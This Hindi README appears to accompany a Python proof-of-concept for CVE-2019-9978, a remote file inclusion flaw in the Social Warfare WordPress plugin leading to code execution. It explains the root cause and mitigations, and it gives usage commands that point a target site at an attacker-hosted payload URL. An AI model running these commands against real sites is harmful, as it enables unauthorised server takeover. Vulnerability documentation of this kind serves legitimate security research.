
CVE 2019-9978 (Social Warfare प्लगइन) के मूल-कारण विश्लेषण और शोषण का प्रदर्शन करने वाला एक कस्टम Python प्रूफ-ऑफ-कॉन्सेप्ट, जो व्यावहारिक RFI से RCE हमले के प्रवाह पर केंद्रित है।
यह रिपॉजिटरी CVE-2019-9978 के शोषण को प्रदर्शित करने वाला एक पायथन-आधारित प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जो Social Warfare WordPress प्लगइन में एक गंभीर कमजोरी है।
यह कमजोरी एक अनधिकृत हमलावर को रिमोट फ़ाइल समावेशन (RFI) करने की अनुमति देती है, जिसे हमलावर-नियंत्रित सर्वर पर एक दुर्भावनापूर्ण पेलोड होस्ट करके Remote Code Execution (RCE)* तक बढ़ाया जा सकता है।
यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए नियंत्रित WordPress प्रयोगशाला वातावरण में विकसित और परीक्षण किया गया था।
| विवरण | मान |
|---|---|
| CVE ID: | CVE-2019-9978 |
| प्रभावित घटक: | Social Warfare (WordPress प्लगइन) |
| प्रभावित संस्करण: | ≤ 3.5.2 |
| कमजोरी का प्रकार: | Remote File Inclusion (RFI) |
| प्रभाव: | Remote Code Execution (RCE) |
| प्रमाणीकरण आवश्यक: | नहीं |
| आक्रमण वेक्टर: | रिमोट |
| गंभीरता: | गंभीर |
Social Warfare प्लगइन उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को ठीक से मान्य और स्वच्छ नहीं करता है जिसका उपयोग रिमोट सामग्री समावेशन के लिए किया जाता है।
परिणामस्वरूप, एक हमलावर एक दुर्भावनापूर्ण बाहरी URL प्रदान कर सकता है, जिससे अनधिकृत रिमोट फ़ाइल समावेशन होता है।
जब शामिल की गई रिमोट फ़ाइल में निष्पादन योग्य PHP कोड होता है, तो इसे WordPress सर्वर के संदर्भ में निष्पादित किया जाता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।
अनधिकृत HTTP अनुरोध
↓
रिमोट फ़ाइल समावेशन (बाहरी URL)
↓
दुर्भावनापूर्ण पेलोड निष्पादन
↓
रिमोट कोड निष्पादन (RCE)
python3 -m http.server 8000
अपनी पेलोड फ़ाइल (जैसे, payload-main.txt) को सर्वर निर्देशिका में रखें।
python3 exploit.py <लक्ष्य-साइट.com> http://हमलावर-आईपी:8000/payload-main.txt
Social Warfare प्लगइन को पैच किए गए संस्करण में अपडेट करें
रिमोट फ़ाइल समावेशन अक्षम करें:
allow_url_include = Off
WordPress प्लगइन्स में बाहरी URL हैंडलिंग को प्रतिबंधित करें
RFI पहचान नियमों के साथ एक वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें
यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।
स्पष्ट अनुमति के बिना इस प्रूफ ऑफ कॉन्सेप्ट का उपयोग सिस्टम के खिलाफ न करें। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।